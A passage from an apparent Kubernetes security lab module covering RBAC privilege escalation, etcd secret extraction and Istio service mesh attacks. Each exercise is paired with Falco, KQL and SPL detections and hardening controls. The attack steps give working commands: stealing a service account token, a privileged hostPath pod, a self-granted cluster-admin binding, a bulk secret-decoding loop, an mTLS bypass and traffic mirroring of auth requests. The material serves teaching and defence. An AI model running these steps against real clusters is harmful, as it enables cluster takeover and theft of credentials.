Kubernetes RBAC (Role-Based Access Control) is the primary authorization mechanism for the Kubernetes API. Misconfigured RBAC bindings are one of the most common pathways to cluster compromise. Service accounts that can create pods, modify RBAC, or access secrets across namespaces provide attackers with reliable escalation paths.
In this exercise, you start with the data-processor-sa service account token obtained in Exercise 1. Your goal is to escalate to cluster-admin through RBAC exploitation alone — without relying on container escape.
Step 2.1: Enumerate Service Account Permissions¶
# Set up API access using the compromised service account token
$ export TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
$ export APISERVER=https://10.96.0.1:443
$ alias k="kubectl --token=$TOKEN --server=$APISERVER --insecure-skip-tls-verify"
# What can this service account do?
$ k auth can-i --list
Resources Non-Resource URLs Resource Names Verbs
pods [] [] [get list watch create update patch delete]
pods/exec [] [] [get list watch create update patch delete]
pods/log [] [] [get list watch create update patch delete]
services [] [] [get list watch create update patch delete]
configmaps [] [] [get list watch create update patch delete]
secrets [] [] [get list]
deployments.apps [] [] [get list watch create update patch delete]
replicasets.apps [] [] [get list watch create update patch delete]
daemonsets.apps [] [] [get list watch create update patch delete]
clusterroles.rbac.authorization.k8s.io [] [] [get list watch]
clusterrolebindings.rbac.authorization.k8s.io [] [] [get list watch]
roles.rbac.authorization.k8s.io [] [] [get list watch]
rolebindings.rbac.authorization.k8s.io [] [] [get list watch]
selfsubjectaccessreviews.authorization.k8s.io [] [] [create]
selfsubjectrulesreviews.authorization.k8s.io [] [] [create]
Finding: Overly Permissive Service Account
The data-processor-sa service account can create pods, exec into pods, read secrets, create deployments, and read RBAC configurations across the cluster. This is far more permission than a data processing workload needs. The ability to create pods + read secrets is a classic privilege escalation vector.
Step 2.2: Enumerate Existing RBAC Bindings¶
# List all ClusterRoles
$ k get clusterroles -o custom-columns=NAME:.metadata.name,RULES:.rules[*].verbs | head -20
NAME RULES
admin [*]
ci-deployer [*]
cluster-admin [*]
edit [create delete deletecollection get list patch update watch]
skyforge-developer [get list watch create update patch delete]
system:aggregate-to-admin [*]
system:aggregate-to-edit [create delete deletecollection patch update]
view [get list watch]
...
# Inspect the suspicious ci-deployer ClusterRole
$ k get clusterrole ci-deployer -o yaml
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: ci-deployer
rules:
- apiGroups: [""]
resources: ["*"]
verbs: ["*"]
- apiGroups: ["apps"]
resources: ["*"]
verbs: ["*"]
- apiGroups: ["rbac.authorization.k8s.io"]
resources: ["*"]
verbs: ["*"]
# Who is bound to ci-deployer?
$ k get clusterrolebindings -o json | jq -r '.items[] | select(.roleRef.name=="ci-deployer") | {name: .metadata.name, subjects: .subjects}'
{
"name": "ci-deployer-binding",
"subjects": [
{
"kind": "ServiceAccount",
"name": "deploy-pipeline-sa",
"namespace": "skyforge-ci"
}
]
}
Finding: CI/CD Service Account Has cluster-admin Equivalent Permissions
The ci-deployer ClusterRole has wildcard permissions (*) on all resources in core, apps, and RBAC API groups. The deploy-pipeline-sa service account in the skyforge-ci namespace is bound to this role. If we can obtain this SA's token, we have effectively cluster-admin access — including the ability to modify RBAC itself.
Step 2.3: Steal CI/CD Service Account Token¶
# Since we can list secrets, find the CI/CD service account token
$ k get secrets -n skyforge-ci
NAME TYPE DATA AGE
default-token-xxxxx kubernetes.io/service-account-token 3 5d
deploy-pipeline-sa-token-yyyyy kubernetes.io/service-account-token 3 5d
registry-creds kubernetes.io/dockerconfigjson 1 5d
# Read the CI/CD service account token
$ k get secret deploy-pipeline-sa-token-yyyyy -n skyforge-ci -o jsonpath='{.data.token}' | base64 -d
eyJhbGciOiJSUzI1NiIsImtpZCI6InN5bnRoZXRpYy1rZXkifQ.SYNTHETIC_TOKEN_CI_DEPLOYER.REDACTED_SIGNATURE
# Store it
$ export CI_TOKEN="eyJhbGciOiJSUzI1NiIsImtpZCI6InN5bnRoZXRpYy1rZXkifQ.SYNTHETIC_TOKEN_CI_DEPLOYER.REDACTED_SIGNATURE"
$ alias kci="kubectl --token=$CI_TOKEN --server=$APISERVER --insecure-skip-tls-verify"
# Verify escalated permissions
$ kci auth can-i --list | head -10
Resources Non-Resource URLs Resource Names Verbs
*.* [] [] [*]
[*] [] [*]
Step 2.4: Create Privileged Pod for Node Access¶
# Use the CI/CD service account to create a privileged debug pod
# EDUCATIONAL PSEUDOCODE — demonstrates the technique for defensive understanding
$ cat <<'EOF' | kci apply -f -
apiVersion: v1
kind: Pod
metadata:
name: debug-pod-attacker
namespace: skyforge-prod
labels:
app: debug-tools
spec:
hostNetwork: true
hostPID: true
hostIPC: true
containers:
- name: debug
image: registry.helios.example.com/skyforge/base-image:latest
command: ["/bin/sh", "-c", "sleep 86400"]
securityContext:
privileged: true
volumeMounts:
- name: host-root
mountPath: /host
volumes:
- name: host-root
hostPath:
path: /
type: Directory
nodeSelector:
kubernetes.io/hostname: ip-10-60-1-20.ec2.internal
EOF
pod/debug-pod-attacker created
# Exec into the debug pod — now we're on Node 2
$ kci exec -it debug-pod-attacker -n skyforge-prod -- /bin/bash
root@ip-10-60-1-20:/# hostname
ip-10-60-1-20.ec2.internal
Step 2.5: Escalate to cluster-admin via RBAC Modification¶
# Since ci-deployer can modify RBAC, create a cluster-admin binding for our original SA
# EDUCATIONAL PSEUDOCODE — demonstrates the technique for defensive understanding
$ cat <<'EOF' | kci apply -f -
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
name: data-processor-admin
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: cluster-admin
subjects:
- kind: ServiceAccount
name: data-processor-sa
namespace: skyforge-prod
EOF
clusterrolebinding.rbac.authorization.k8s.io/data-processor-admin created
# Now our original service account has cluster-admin!
$ k auth can-i --list | head -5
Resources Non-Resource URLs Resource Names Verbs
*.* [] [] [*]
[*] [] [*]
$ k auth can-i '*' '*' --all-namespaces
yes
Critical: cluster-admin Achieved via RBAC Chain
Attack chain: data-processor-sa (can list secrets) -> deploy-pipeline-sa token stolen from skyforge-ci namespace -> CI/CD SA has RBAC wildcard permissions -> Created new ClusterRoleBinding granting data-processor-sa cluster-admin. This is a three-hop privilege escalation using only Kubernetes API calls.
Step 2.6: Demonstrate Post-Exploitation with cluster-admin¶
# List all secrets across ALL namespaces
$ k get secrets --all-namespaces | wc -l
47
# List all nodes
$ k get nodes -o wide
NAME STATUS ROLES AGE VERSION INTERNAL-IP EXTERNAL-IP OS-IMAGE
ip-10-60-1-10.ec2.internal Ready control-plane 5d v1.29.2 10.60.1.10 203.0.113.40 Ubuntu 22.04
ip-10-60-1-20.ec2.internal Ready <none> 5d v1.29.2 10.60.1.20 203.0.113.43 Ubuntu 22.04
ip-10-60-1-30.ec2.internal Ready <none> 5d v1.29.2 10.60.1.30 203.0.113.44 Ubuntu 22.04
# Access secrets in kube-system namespace
$ k get secret -n kube-system
NAME TYPE DATA AGE
bootstrap-token-xxxxx bootstrap.kubernetes.io/token 6 5d
cloud-provider-config Opaque 1 5d
etcd-certs kubernetes.io/tls 3 5d
# Enumerate all service accounts
$ k get sa --all-namespaces | wc -l
23
Detection: RBAC Exploitation¶
Falco Rules¶
# Falco rule: Detect listing secrets in sensitive namespaces
- rule: List Secrets in kube-system
desc: Non-system account listing secrets in kube-system namespace
condition: >
kevt and kcreate and ka.target.resource = "selfsubjectaccessreviews"
or (kevt and kget and ka.target.resource = "secrets"
and ka.target.namespace = "kube-system"
and not ka.user.name in (system_users))
output: >
Secrets listed in kube-system by non-system user
(user=%ka.user.name resource=%ka.target.resource ns=%ka.target.namespace)
priority: HIGH
tags: [k8s, rbac, secrets]
# Falco rule: Detect ClusterRoleBinding creation
- rule: ClusterRoleBinding Created
desc: New ClusterRoleBinding created — potential privilege escalation
condition: >
kevt and kcreate and ka.target.resource = "clusterrolebindings"
output: >
ClusterRoleBinding created (user=%ka.user.name
binding=%ka.target.name role=%jevt.value[/requestObject/roleRef/name])
priority: CRITICAL
tags: [k8s, rbac, privilege_escalation]
KQL Detection¶
// KQL: Detect RBAC permission enumeration
AzureDiagnostics
| where Category == "kube-audit"
| extend AuditLog = parse_json(log_s)
| where AuditLog.verb == "create"
and AuditLog.objectRef.resource == "selfsubjectaccessreviews"
| project TimeGenerated,
User = AuditLog.user.username,
SourceIP = AuditLog.sourceIPs[0],
UserAgent = AuditLog.userAgent
| summarize EnumCount = count(), DistinctIPs = dcount(SourceIP) by User, bin(TimeGenerated, 5m)
| where EnumCount > 3
| sort by TimeGenerated desc
// KQL: Detect ClusterRoleBinding creation to cluster-admin
AzureDiagnostics
| where Category == "kube-audit"
| extend AuditLog = parse_json(log_s)
| where AuditLog.verb == "create"
and AuditLog.objectRef.resource == "clusterrolebindings"
| extend RoleRef = AuditLog.requestObject.roleRef.name
| where RoleRef == "cluster-admin"
| project TimeGenerated,
User = AuditLog.user.username,
BindingName = AuditLog.objectRef.name,
RoleRef,
Subjects = AuditLog.requestObject.subjects,
SourceIP = AuditLog.sourceIPs[0]
| sort by TimeGenerated desc
// KQL: Detect privileged pod creation by non-system accounts
AzureDiagnostics
| where Category == "kube-audit"
| extend AuditLog = parse_json(log_s)
| where AuditLog.verb == "create"
and AuditLog.objectRef.resource == "pods"
| extend Privileged = AuditLog.requestObject.spec.containers[0].securityContext.privileged,
HostNetwork = AuditLog.requestObject.spec.hostNetwork,
HostPID = AuditLog.requestObject.spec.hostPID
| where Privileged == true or HostNetwork == true or HostPID == true
| where AuditLog.user.username !startswith "system:"
| project TimeGenerated,
User = AuditLog.user.username,
Namespace = AuditLog.objectRef.namespace,
PodName = AuditLog.objectRef.name,
Privileged, HostNetwork, HostPID
| sort by TimeGenerated desc
SPL Detection¶
// SPL: Detect ClusterRoleBinding creation to cluster-admin
index=kubernetes sourcetype="kube:audit"
verb=create objectRef.resource=clusterrolebindings
| spath "requestObject.roleRef.name" as role_ref
| where role_ref="cluster-admin"
| table _time, user.username, objectRef.name, role_ref, requestObject.subjects{}.name, sourceIPs{}
// SPL: Detect cross-namespace secret access
index=kubernetes sourcetype="kube:audit"
verb=get objectRef.resource=secrets
| spath "user.username" as user
| spath "objectRef.namespace" as target_ns
| where NOT match(user, "^system:")
| stats count as access_count, values(target_ns) as namespaces_accessed by user
| where mvcount(namespaces_accessed) > 1
| table _time, user, namespaces_accessed, access_count
// SPL: Detect RBAC enumeration (auth can-i --list)
index=kubernetes sourcetype="kube:audit"
verb=create objectRef.resource=selfsubjectaccessreviews
| spath "user.username" as user
| spath "sourceIPs{}" as src_ip
| bin _time span=5m
| stats count as enum_count by _time, user, src_ip
| where enum_count > 3
| table _time, user, src_ip, enum_count
Defensive Measures: Preventing RBAC Exploitation¶
Prevention Controls
1. Principle of Least Privilege for Service Accounts
# GOOD: Minimal role for data-processor
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
name: data-processor-minimal
namespace: skyforge-prod
rules:
- apiGroups: [""]
resources: ["configmaps"]
verbs: ["get"]
resourceNames: ["data-processor-config"] # Named resources only
2. Disable Automount of Service Account Tokens
apiVersion: v1
kind: ServiceAccount
metadata:
name: data-processor-sa
namespace: skyforge-prod
automountServiceAccountToken: false
3. Restrict RBAC Modification
Never grant create, update, or patch on clusterrolebindings or clusterroles to non-admin service accounts:
# Use ValidatingAdmissionWebhook to block:
# - ClusterRoleBinding creation referencing cluster-admin
# - ClusterRole creation with wildcard verbs/resources
4. Use Namespace-Scoped Roles Instead of ClusterRoles
# Prefer Role + RoleBinding (namespace-scoped)
# over ClusterRole + ClusterRoleBinding (cluster-wide)
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
name: ci-deployer-prod-only
namespace: skyforge-prod # Scoped to single namespace
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: Role
name: deployer-role
subjects:
- kind: ServiceAccount
name: deploy-pipeline-sa
namespace: skyforge-ci
5. RBAC Audit with rbac-police or kubectl-who-can
Exercise 2 Summary¶
| Step | Action | Finding | Severity |
|---|---|---|---|
| 2.1 | Permission enumeration | SA has pod create + secret read + RBAC read | High |
| 2.2 | RBAC binding enumeration | ci-deployer has wildcard permissions | Critical |
| 2.3 | Cross-namespace secret theft | CI/CD SA token accessible | Critical |
| 2.4 | Privileged pod creation | Node access via debug pod | Critical |
| 2.5 | RBAC modification | Self-granted cluster-admin | Critical |
| 2.6 | Post-exploitation | Full cluster control achieved | Critical |
Exercise 3: Secret Extraction & etcd Access¶
Time Estimate: 45–60 minutes ATT&CK Mapping: T1552.007 (Unsecured Credentials: Container API), T1552.001 (Unsecured Credentials: Credentials in Files)
Objectives¶
- Access the etcd datastore from a compromised control plane node
- Extract Kubernetes secrets directly from etcd using
etcdctl - Decode base64-encoded secrets and demonstrate the data at risk
- Understand why encryption at rest for etcd is critical
- Detect and prevent unauthorized etcd access
Background¶
etcd is the key-value store that backs the entire Kubernetes cluster state — including all Secrets, ConfigMaps, RBAC policies, and workload definitions. By default, Kubernetes stores Secrets in etcd as base64-encoded plaintext (not encrypted). An attacker who gains access to etcd can extract every secret in the cluster without going through the Kubernetes API.
In this exercise, you have escalated to the control plane node (from Exercise 1 or 2). The goal is to demonstrate direct etcd access and why encryption at rest is a must-have control.
Step 3.1: Identify etcd on the Control Plane¶
# After escaping to the control plane node (10.60.1.10)
# Locate etcd process
$ ps aux | grep etcd
root 2847 5.1 8.2 10794532 167280 ? Ssl Apr07 4:32 /usr/local/bin/etcd \
--advertise-client-urls=https://10.60.1.10:2379 \
--cert-file=/etc/kubernetes/pki/etcd/server.crt \
--client-cert-auth=true \
--data-dir=/var/lib/etcd \
--key-file=/etc/kubernetes/pki/etcd/server.key \
--listen-client-urls=https://127.0.0.1:2379,https://10.60.1.10:2379 \
--listen-peer-urls=https://10.60.1.10:2380 \
--trusted-ca-file=/etc/kubernetes/pki/etcd/ca.crt
# Note the certificate locations — we need these to authenticate
$ ls -la /etc/kubernetes/pki/etcd/
total 40
drwxr-xr-x 2 root root 4096 Apr 7 08:00 .
drwxr-xr-x 3 root root 4096 Apr 7 08:00 ..
-rw-r--r-- 1 root root 1058 Apr 7 08:00 ca.crt
-rw------- 1 root root 1679 Apr 7 08:00 ca.key
-rw-r--r-- 1 root root 1159 Apr 7 08:00 healthcheck-client.crt
-rw------- 1 root root 1679 Apr 7 08:00 healthcheck-client.key
-rw-r--r-- 1 root root 1159 Apr 7 08:00 peer.crt
-rw------- 1 root root 1679 Apr 7 08:00 peer.key
-rw-r--r-- 1 root root 1159 Apr 7 08:00 server.crt
-rw------- 1 root root 1679 Apr 7 08:00 server.key
# Verify etcd is accessible
$ export ETCDCTL_API=3
$ export ETCDCTL_CACERT=/etc/kubernetes/pki/etcd/ca.crt
$ export ETCDCTL_CERT=/etc/kubernetes/pki/etcd/server.crt
$ export ETCDCTL_KEY=/etc/kubernetes/pki/etcd/server.key
$ export ETCDCTL_ENDPOINTS=https://127.0.0.1:2379
$ etcdctl endpoint health
https://127.0.0.1:2379 is healthy: successfully committed proposal: took = 2.108775ms
Step 3.2: Enumerate etcd Contents¶
# List all keys in etcd (Kubernetes stores data under /registry/)
$ etcdctl get / --prefix --keys-only | head -30
/registry/apiregistration.k8s.io/apiservices/v1.
/registry/apiregistration.k8s.io/apiservices/v1.apps
/registry/clusterrolebindings/ci-deployer-binding
/registry/clusterrolebindings/cluster-admin
/registry/clusterrolebindings/data-processor-admin
/registry/clusterrolebindings/skyforge-developer-binding
/registry/clusterroles/ci-deployer
/registry/clusterroles/cluster-admin
/registry/clusterroles/skyforge-developer
/registry/configmaps/skyforge-prod/data-processor-config
/registry/deployments/skyforge-prod/api-gateway
/registry/deployments/skyforge-prod/auth-service
/registry/deployments/skyforge-prod/report-engine
/registry/namespaces/default
/registry/namespaces/istio-system
/registry/namespaces/kube-system
/registry/namespaces/monitoring
/registry/namespaces/skyforge-ci
/registry/namespaces/skyforge-prod
/registry/namespaces/skyforge-staging
/registry/pods/skyforge-prod/data-processor
/registry/secrets/default/default-token-xxxxx
/registry/secrets/kube-system/bootstrap-token-xxxxx
/registry/secrets/kube-system/cloud-provider-config
/registry/secrets/kube-system/etcd-certs
/registry/secrets/skyforge-ci/deploy-pipeline-sa-token-yyyyy
/registry/secrets/skyforge-ci/registry-creds
/registry/secrets/skyforge-prod/auth-secrets
/registry/secrets/skyforge-prod/db-credentials
/registry/secrets/skyforge-prod/tls-certs
# Count total secrets
$ etcdctl get /registry/secrets --prefix --keys-only | wc -l
18
Step 3.3: Extract Secrets from etcd¶
# Extract the database credentials secret
$ etcdctl get /registry/secrets/skyforge-prod/db-credentials
# Output is binary protobuf — use -w fields to see structured data
$ etcdctl get /registry/secrets/skyforge-prod/db-credentials -w fields
"Key" : "/registry/secrets/skyforge-prod/db-credentials"
"Value" : "k8s\x00\n\x0f\n\x02v1\x12\x06Secret\x..."
# The raw output is protobuf-encoded. Extract just the data portion:
$ etcdctl get /registry/secrets/skyforge-prod/db-credentials -w json | jq -r '.kvs[0].value' | base64 -d
{
"apiVersion": "v1",
"kind": "Secret",
"metadata": {
"name": "db-credentials",
"namespace": "skyforge-prod"
},
"data": {
"username": "c2t5Zm9yZ2VfYWRtaW4=",
"password": "UkVEQUNURUQ=",
"connection-string": "cG9zdGdyZXNxbDovL3NreWZvcmdlX2FkbWluOlJFREFDVEVEQDEwLjYwLjIuMTA6NTQzMi9za3lmb3JnZQ=="
}
}
# Decode the base64 values
$ echo "c2t5Zm9yZ2VfYWRtaW4=" | base64 -d
skyforge_admin
$ echo "UkVEQUNURUQ=" | base64 -d
REDACTED
$ echo "cG9zdGdyZXNxbDovL3NreWZvcmdlX2FkbWluOlJFREFDVEVEQDEwLjYwLjIuMTA6NTQzMi9za3lmb3JnZQ==" | base64 -d
postgresql://skyforge_admin:REDACTED@10.60.2.10:5432/skyforge
Finding: Secrets Stored in Plaintext in etcd
Kubernetes secrets are only base64-encoded — not encrypted — in etcd by default. Anyone with read access to etcd can extract every secret in the cluster. This includes database passwords, API keys, TLS private keys, OAuth client secrets, and service account tokens.
Step 3.4: Extract All Secrets at Scale¶
# EDUCATIONAL PSEUDOCODE — demonstrates the scope of the threat
# Extract all secrets from all namespaces in one operation
$ for key in $(etcdctl get /registry/secrets --prefix --keys-only); do
echo "=== $key ==="
etcdctl get "$key" -w json | jq -r '.kvs[0].value' | base64 -d 2>/dev/null | \
python3 -c "import sys,json; d=json.load(sys.stdin); [print(f' {k}: {__import__(\"base64\").b64decode(v).decode()}') for k,v in d.get('data',{}).items()]" 2>/dev/null
done
Expected Output (Synthetic — all values REDACTED):
=== /registry/secrets/skyforge-prod/auth-secrets ===
jwt-secret: REDACTED
oauth-client-secret: REDACTED
=== /registry/secrets/skyforge-prod/db-credentials ===
username: skyforge_admin
password: REDACTED
connection-string: postgresql://skyforge_admin:REDACTED@10.60.2.10:5432/skyforge
=== /registry/secrets/skyforge-prod/tls-certs ===
tls.crt: REDACTED-CERTIFICATE-DATA
tls.key: REDACTED-PRIVATE-KEY-DATA
=== /registry/secrets/skyforge-ci/registry-creds ===
.dockerconfigjson: {"auths":{"registry.helios.example.com":{"auth":"REDACTED"}}}
=== /registry/secrets/kube-system/cloud-provider-config ===
cloud-config: REDACTED-AWS-CREDENTIALS
=== /registry/secrets/kube-system/etcd-certs ===
tls.crt: REDACTED-ETCD-CERT
tls.key: REDACTED-ETCD-KEY
ca.crt: REDACTED-ETCD-CA
Critical: Complete Secret Inventory Extracted
From etcd, 18 secrets were extracted across all namespaces including:
- Database credentials (PostgreSQL connection strings)
- Authentication secrets (JWT signing keys, OAuth client secrets)
- TLS certificates and private keys
- Container registry credentials
- Cloud provider configuration (AWS credentials)
- etcd TLS certificates (self-referential — access to etcd grants more etcd access)
Step 3.5: Demonstrate Encryption at Rest Gap¶
# Check if etcd encryption at rest is configured
$ cat /etc/kubernetes/manifests/kube-apiserver.yaml | grep encryption
# If no output — encryption at rest is NOT configured
# Check for EncryptionConfiguration
$ ls /etc/kubernetes/enc/
ls: cannot access '/etc/kubernetes/enc/': No such file or directory
# Encryption config does not exist — secrets are stored in plaintext
# What proper encryption configuration looks like:
$ cat <<'EOF'
# RECOMMENDED: EncryptionConfiguration for secrets at rest
apiVersion: apiserver.config.k8s.io/v1
kind: EncryptionConfiguration
resources:
- resources:
- secrets
- configmaps
providers:
- aescbc:
keys:
- name: key1
secret: REDACTED-BASE64-ENCODED-32-BYTE-KEY
- identity: {} # Fallback for reading unencrypted data
EOF
# To enable, add to kube-apiserver manifest:
# --encryption-provider-config=/etc/kubernetes/enc/encryption-config.yaml
Detection: etcd Access¶
Falco Rules¶
# Falco rule: Detect etcdctl execution on control plane
- rule: etcdctl Executed on Control Plane
desc: etcdctl command was executed — potential secret extraction
condition: >
spawned_process and proc.name = "etcdctl"
and not user.name in (etcd_maintenance_users)
output: >
etcdctl executed (user=%user.name command=%proc.cmdline
parent=%proc.pname container=%container.name)
priority: CRITICAL
tags: [etcd, secrets, credential_access, T1552]
# Falco rule: Detect reading etcd certificate files
- rule: etcd Certificate Files Read
desc: Process reading etcd TLS certificates — potential etcd access preparation
condition: >
open_read and (fd.name startswith /etc/kubernetes/pki/etcd/)
and not proc.name in (etcd, kube-apiserver, kubelet)
output: >
etcd certificate file read by unexpected process
(file=%fd.name process=%proc.name user=%user.name)
priority: HIGH
tags: [etcd, certificate, credential_access]
KQL Detection¶
// KQL: Detect etcd access from non-API-server processes
// This requires node-level audit logging (e.g., Azure Monitor agent on AKS nodes)
Syslog
| where SyslogMessage has "etcdctl" or SyslogMessage has "etcd" and SyslogMessage has "get"
| where ProcessName != "kube-apiserver" and ProcessName != "etcd"
| project TimeGenerated, Computer, ProcessName, SyslogMessage
| sort by TimeGenerated desc
// KQL: Detect etcd port access from unexpected sources
AzureNetworkAnalytics_CL
| where DestPort_d == 2379 or DestPort_d == 2380
| where SrcIP_s !in ("10.60.1.10", "10.60.1.11", "10.60.1.12") // Expected control plane nodes
| project TimeGenerated, SrcIP_s, DestIP_s, DestPort_d, FlowStatus_s
| sort by TimeGenerated desc
// KQL: Detect bulk secret reads via Kubernetes API (alternative path)
AzureDiagnostics
| where Category == "kube-audit"
| extend AuditLog = parse_json(log_s)
| where AuditLog.verb == "list" and AuditLog.objectRef.resource == "secrets"
| project TimeGenerated,
User = AuditLog.user.username,
Namespace = AuditLog.objectRef.namespace,
SourceIP = AuditLog.sourceIPs[0]
| summarize SecretListCount = count() by User, bin(TimeGenerated, 5m)
| where SecretListCount > 5
| sort by TimeGenerated desc
SPL Detection¶
// SPL: Detect etcdctl execution
index=os sourcetype="syslog" OR sourcetype="linux:audit"
("etcdctl" AND ("get" OR "watch" OR "snapshot"))
| eval severity=case(
searchmatch("--prefix"), "CRITICAL",
searchmatch("/registry/secrets"), "CRITICAL",
1=1, "HIGH"
)
| table _time, host, user, process, cmdline, severity
// SPL: Detect etcd port connections from unexpected sources
index=network sourcetype="firewall" dest_port IN (2379, 2380)
| where NOT cidrmatch("10.60.1.0/24", src_ip)
| table _time, src_ip, dest_ip, dest_port, action
// SPL: Detect bulk secret reads through Kubernetes API
index=kubernetes sourcetype="kube:audit"
verb IN ("get", "list") objectRef.resource=secrets
| spath "user.username" as user
| bin _time span=1m
| stats count as secret_reads, dc(objectRef.namespace) as namespaces by user, _time
| where secret_reads > 10 OR namespaces > 2
| table _time, user, secret_reads, namespaces
Defensive Measures: Protecting etcd¶
Prevention Controls
1. Enable Encryption at Rest
# /etc/kubernetes/enc/encryption-config.yaml
apiVersion: apiserver.config.k8s.io/v1
kind: EncryptionConfiguration
resources:
- resources:
- secrets
- configmaps
providers:
- aescbc:
keys:
- name: key1
secret: REDACTED-BASE64-ENCODED-32-BYTE-KEY
- identity: {}
Add to kube-apiserver: --encryption-provider-config=/etc/kubernetes/enc/encryption-config.yaml
2. Use External Secrets Management
# Use External Secrets Operator with HashiCorp Vault or AWS Secrets Manager
apiVersion: external-secrets.io/v1beta1
kind: ExternalSecret
metadata:
name: db-credentials
namespace: skyforge-prod
spec:
refreshInterval: 1h
secretStoreRef:
name: vault-backend
kind: ClusterSecretStore
target:
name: db-credentials
data:
- secretKey: password
remoteRef:
key: skyforge/database
property: password
3. Restrict etcd Network Access
- etcd should only be accessible from the API server
- Use network policies / firewall rules to restrict port 2379/2380
- Enable mutual TLS for all etcd communications
4. etcd Client Certificate Rotation
Rotate etcd certificates regularly and restrict file permissions:
chmod 600 /etc/kubernetes/pki/etcd/*.key
chmod 644 /etc/kubernetes/pki/etcd/*.crt
chown root:root /etc/kubernetes/pki/etcd/*
5. Regular Secret Auditing
Exercise 3 Summary¶
| Step | Action | Finding | Severity |
|---|---|---|---|
| 3.1 | etcd identification | etcd accessible with node certs | Critical |
| 3.2 | Key enumeration | Full cluster state visible in etcd | Critical |
| 3.3 | Secret extraction | Database credentials decoded | Critical |
| 3.4 | Bulk extraction | 18 secrets across all namespaces | Critical |
| 3.5 | Encryption audit | No encryption at rest configured | Critical |
Exercise 4: Service Mesh Attacks¶
Time Estimate: 60–75 minutes ATT&CK Mapping: T1557 (Adversary-in-the-Middle), T1071.001 (Application Layer Protocol)
Objectives¶
- Bypass Istio mTLS by communicating directly between pods without the mesh
- Manipulate Istio VirtualService resources to hijack traffic between services
- Extract service mesh certificates from sidecar containers
- Demonstrate sidecar injection attacks
- Detect service mesh tampering through Istio telemetry and audit logs
Background¶
Service meshes like Istio provide mutual TLS (mTLS), traffic management, and observability. However, a misconfigured service mesh can create a false sense of security. If mTLS is set to PERMISSIVE mode instead of STRICT, pods can communicate without encryption. An attacker with RBAC access to Istio custom resources (VirtualService, DestinationRule, Gateway) can redirect traffic, inject sidecars with malicious configurations, or extract mesh certificates for impersonation.
Step 4.1: Enumerate Service Mesh Configuration¶
# Check if Istio is installed and which version
$ k get pods -n istio-system
NAME READY STATUS RESTARTS AGE
istio-ingressgateway-7b4c9d5f8-x9k2m 1/1 Running 0 5d
istiod-6f8c4d9b7-p4m2n 1/1 Running 0 5d
$ k get svc -n istio-system
NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S)
istio-ingressgateway LoadBalancer 10.96.0.100 203.0.113.42 80:30080/TCP,443:30443/TCP
istiod ClusterIP 10.96.0.50 <none> 15010/TCP,15012/TCP,443/TCP,15014/TCP
# Check mTLS mode
$ k get peerauthentication --all-namespaces
NAMESPACE NAME MODE AGE
istio-system default PERMISSIVE 5d
skyforge-prod mesh-policy PERMISSIVE 5d
# Check if all pods have sidecar injection
$ k get pods -n skyforge-prod -o jsonpath='{range .items[*]}{.metadata.name}{"\t"}{.spec.containers[*].name}{"\n"}{end}'
data-processor processor
auth-service-xxx auth istio-proxy
auth-service-yyy auth istio-proxy
api-gateway-xxx gateway istio-proxy
api-gateway-yyy gateway istio-proxy
api-gateway-zzz gateway istio-proxy
report-engine-xxx reports istio-proxy
Finding: mTLS in PERMISSIVE Mode
The mesh-wide mTLS policy is set to PERMISSIVE, meaning pods accept both encrypted (mTLS) and plaintext connections. An attacker inside the mesh can bypass mTLS entirely by sending plaintext HTTP directly to pod IPs, bypassing the Envoy sidecar.
Finding: data-processor Pod Missing Sidecar
The compromised data-processor pod does not have an istio-proxy sidecar container. This means it operates outside the mesh's mTLS and traffic policy enforcement. It can communicate with any pod using plaintext, bypassing all mesh policies.
Step 4.2: Bypass mTLS — Direct Pod Communication¶
# From the data-processor pod (no sidecar), communicate directly with auth-service
# Bypass the mesh by hitting the pod IP instead of the service
# Get auth-service pod IP
$ k get pods -n skyforge-prod -l app=auth-service -o wide
NAME READY STATUS IP NODE
auth-service-abc123 2/2 Running 10.244.1.15 ip-10-60-1-20.ec2.internal
auth-service-def456 2/2 Running 10.244.2.22 ip-10-60-1-30.ec2.internal
# Direct HTTP request to auth-service pod (bypassing Envoy sidecar)
# Because mTLS is PERMISSIVE, the application port accepts plaintext
$ curl -s http://10.244.1.15:8080/api/v1/users/1
{
"id": 1,
"username": "admin",
"email": "admin@helios.example.com",
"role": "cluster-admin",
"last_login": "2026-04-07T07:30:00Z"
}
# This request was NOT encrypted, NOT logged by Istio telemetry,
# and NOT subject to Istio authorization policies
Finding: mTLS Bypass Successful
By communicating directly to the pod IP on the application port, the attacker bypasses the Envoy sidecar entirely. This means:
- No mTLS encryption on the wire
- No Istio access logs for the request
- No Istio AuthorizationPolicy enforcement
- No rate limiting or traffic management
Step 4.3: Traffic Hijacking via VirtualService Manipulation¶
# With cluster-admin (from Exercise 2), modify Istio VirtualService
# to redirect traffic destined for auth-service to our data-processor pod
# First, check existing VirtualServices
$ k get virtualservices -n skyforge-prod
NAME GATEWAYS HOSTS AGE
api-gateway-vs [mesh] [api.helios.example.com] 5d
auth-service-vs [mesh] [auth-service] 5d
$ k get virtualservice auth-service-vs -n skyforge-prod -o yaml
apiVersion: networking.istio.io/v1beta1
kind: VirtualService
metadata:
name: auth-service-vs
namespace: skyforge-prod
spec:
hosts:
- auth-service
http:
- route:
- destination:
host: auth-service
port:
number: 8080
weight: 100
# EDUCATIONAL PSEUDOCODE — demonstrates the technique for defensive understanding
# Modify VirtualService to mirror traffic to attacker-controlled endpoint
$ cat <<'EOF' | k apply -f -
apiVersion: networking.istio.io/v1beta1
kind: VirtualService
metadata:
name: auth-service-vs
namespace: skyforge-prod
spec:
hosts:
- auth-service
http:
- route:
- destination:
host: auth-service
port:
number: 8080
weight: 100
mirror:
host: data-processor
port:
number: 9090
mirrorPercentage:
value: 100.0
EOF
virtualservice.networking.istio.io/auth-service-vs configured
# Now ALL traffic to auth-service is mirrored to our data-processor pod
# This includes authentication requests with credentials
Finding: Traffic Mirroring Attack
By modifying the Istio VirtualService, the attacker mirrors 100% of auth-service traffic to the compromised pod. This captures authentication tokens, credentials, and sensitive API payloads without disrupting the legitimate service. This is a stealthy man-in-the-middle attack using the service mesh itself.
